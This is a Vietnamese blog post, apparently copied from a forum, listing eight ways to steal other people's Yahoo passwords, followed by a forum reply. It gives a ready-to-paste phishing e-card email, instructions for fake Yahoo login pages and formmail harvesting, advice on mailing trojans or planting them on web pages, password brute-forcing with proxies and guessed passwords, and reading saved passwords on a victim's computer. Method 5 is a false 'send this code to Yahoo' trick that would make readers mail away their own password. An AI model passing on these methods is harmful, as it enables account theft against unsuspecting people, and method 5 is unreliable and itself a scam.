8 cách hack yahoo

22 Th4

Cách 1:Hack pass bằng điện hoa
+Trước hết mở hộp thư cua các bạn ra,chọn composed để bắt đầu gửi thư
+Trong phần nội dung,chọn View HTML source,sau đó biên soạn nội dung sau:

Ban co 1 buc dien hoa tu hacker(hoac ten cua ban) voi tieu de nhu sau :
Chuc ban vui ve
Hay nhap chuot vao day de xem buc dien hoa

http://dienhoa.vnn.vn/1&YY=80401&in…pos=0&/view.php

You have a greeting crad from hacker with subject :
chuc ban vui ve
Click here to view greeting card

http://dienhoa.vnn.vn/1&YY=80401&in…pos=0&/view.php

Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào là được ;

—————————————————————————————————-

Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :

Chuc ban vui ve

Hay nhap chuot vao day de xem buc dien hoa

http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php

You have a greeting crad from Tran hung anh with subject :

chuc ban vui ve

Click here to view greeting card

http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php

——————————————————————————————-

-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở trang web giả mạo trên,lập tưc password sẽ bị lộ.Khi đó bạn hãy vào trang web này để xem kết quả:http://00dt1yahoofake.dk3.com
Nào,bắt đầu tấn công đi,chúc các bạn thành công!

Hoặc bạn có thể dùng luôn cái greetingcard sau

http://americargreetings.com/

Ban dang nhap vao , den cai phan link tao thiep ban dien lung tung vao , vi du nhu http://anhyeuem.com
-noi dung thi ban dien cai gi cung duoc
-sau do ban an vao chu tao mail
-den cai phan ten nguoi gui , bansua no thanh cai gi tuy ban
-den cai phan email nguio gui , ban sua no thanh dienhoa.vnnv.n
-den cai phan tieu de` , ban sua thanh : ban co mot buc dien hoa tu ……
sau đó bạn gửi mail đi là được chúc thành công nhé

Ngoài ra bạn cũng có thể sủ dụng cách này để đạt được sác xuất thành công cao hơn

Cách 2: đây cũng là 1 cách nhà quê,

Bạn có thể download Ybrute – 1 chương trình dò Yahoo pass – còn cách sử dụng nó thì đừng có hỏi tui, hỏi là tui oánh đó, lớn tướng rùi mà còn hỏi vớ vẩn. Tuy nhiên khi mới vô thì tui cũng xài qua cách này, điểm yếu của cách này là chỉ có tác dụng khi victim xài pass là 1 từ có trong từ điển hay là 1 câu nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều thời gian (hêhê, cứ vừa ngồi đợi nó tìm mà nghe tiền bay dần khỏi túi).

Cách 3: bạn có thể tạo 1 giao diện giống hệt như Yahoo

(việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu… hê hê…để cho khi victim gõ pass và user name thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc dụ victim vô tròng…khà khà…nếu bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sẽ có nhiều chú thỏ vô bẫy. #

Cách 4: Sử dụng Trojan: Có rất nhiều loại Trojan

giúp bạn lấy password email, dial-up, account… như là: Hoocker,Barrio5.0,Barox, Kuang2,….! Bạn có thể Download chúng ở đầy rẫy trên mạng ở các trang hacker.

Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ “chảy” về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có “chàng vệ sĩ” Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui

Nếu bạn có thể tạo trang Web bạn có thể đính kèm Trojan vào trang Web để khi victim vào trang web đó của bạn Trojan sẽ được tự động down về máy victim mà họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để đính kèm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.

Cách 5 Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: lookdown_pass@yahoo.com
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript sau:

CODE

/config/cgi-bin/start?v703&login= “Tên login của bạn”&f=”password của bạn”&f= 27586&javascript=ACTIVE&rsa> infor/-password#=”” send back/?v_&from=”địa chỉ muốn lấy pass” (nhớ phải đánh thêm @yahoo.com nhe!)

Ví dụ:

Tên login của bạn là “hacker”, password là “nobody” và địa chỉ muốn lấy pass là “victim@yahoo.com ” chẳng hạn thì bạn đánh như sau:

CODE

/config/cgi-bin/start?v703&login=”hacker”&f=”nobody”&f= 27586&javascript=ACTIVE&rsa> infor/-password#=”” send back/?v_&from=”victim@yahoo.com ”

*The Yahoo system cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Yahoo sever tới một password của người khác. Password sẽ tự động được gửi đến email của bạn trong dấu””.

Cách này tuy dễ thực hiện nhưng tỷ lệ thành công chỉ khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà không hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà không thấy Yahoo sever hồi âm thì có lẽ bạn lên chuyển sang cách sau

Cách 6:Dịch pass **** về nguyên dạng cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy’s Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái remember user name and password nữa đâu.
Down ở đây:download

Cách 7:
1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sẽ báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.

2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sẽ báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sẽ được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải “bom” shortcut checkmail và chỉ chờ cho victim checkmail là OK!

Tuy nhiên hiện nay bravenet đã yêu cầu chứng nhận thông tin của emailform trước khi gửi đi do đó chúng ta chỉ dùng cách này để tham khảo mà không dùng được nữa vì nạn nhân sẽ phát hiện ra ngay. Bởi vậy, tại sao chúng ta không tự tạo ra code cho mình, vừa nhiều tính năng hơn lại khỏi phải phụ thuộc.

Cách 8:Crack nick YM
Đây là sơ lượt một chút về crack nick Yahoo qua một thời gian mình tìm hiểu, rất đơn giản và rất có hiệu quả.

1-Soft để crack (vn chỉ có thể dùng socker 10 hay 15 nếu dùng ADSL thì socker: 20 hay 30 cung okay -Yahoo server: trước hết các bạn muốn cack nick các bạn phải chọn đúng server Yahoo và nick bạn đang cần crack nó nằm trong server nào. (note: Phải thử coi soft đó crack có good không bằng cách tạo cho mình 20 nicks và 10 pass khác nhau xem thử soft nó có work good không)

2- Bạn phải co’ good proxy để crack (Các bạn Việt Nam muốn crack được nick Yahoo phải fake proxy USA or TW HK …etc

3- Dùng pass đúng trong trường hợp nick đó người ta sẽ xài pass ra sao (Ví dụ: nick ở USA thì pass thường là sexy lovesexy nigger, dude….etc . còn ở TW thì có thể là pass: asdfg, yuang, jackchan, chang ….etc Như vậy các bạn mới có thể lấy được nick người ta được, (còn nick thì English pass thì của Indian thì khỏi nhận được nick nào đi crack 10 hoặc 20 năm mình bảo đảm bạn sẽ không lấy được 1 nick nào )
Đó là cách dễ nhất để crack Yahoo nicks
:Teen9x_153: :Teen9x_153: :Teen9x_153: :Teen9x_153:


ZoLeK
05-11-2006, 06:06 PM
Khá lém , từ cách 1 => cách 7 còn dễ , tới cách 8 thì khá là mệt nhưng dễ thành công hơn , mấy cách kia chỉ lừa được con nít . Mà bạn copy bài này ở đâu thì để nguồn dùm nhe

Cách 6ịch pass **** về nguyên dạng cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy’s Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái remember user name and password nữa đâu.
Down ở đây:download ==> chỗ này phải là URL download , do copy nên nó chỉ lấy chữ download chứ kô lấy cái link , check lại nha bạn

Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

w

Connecting to %s

%d bloggers like this: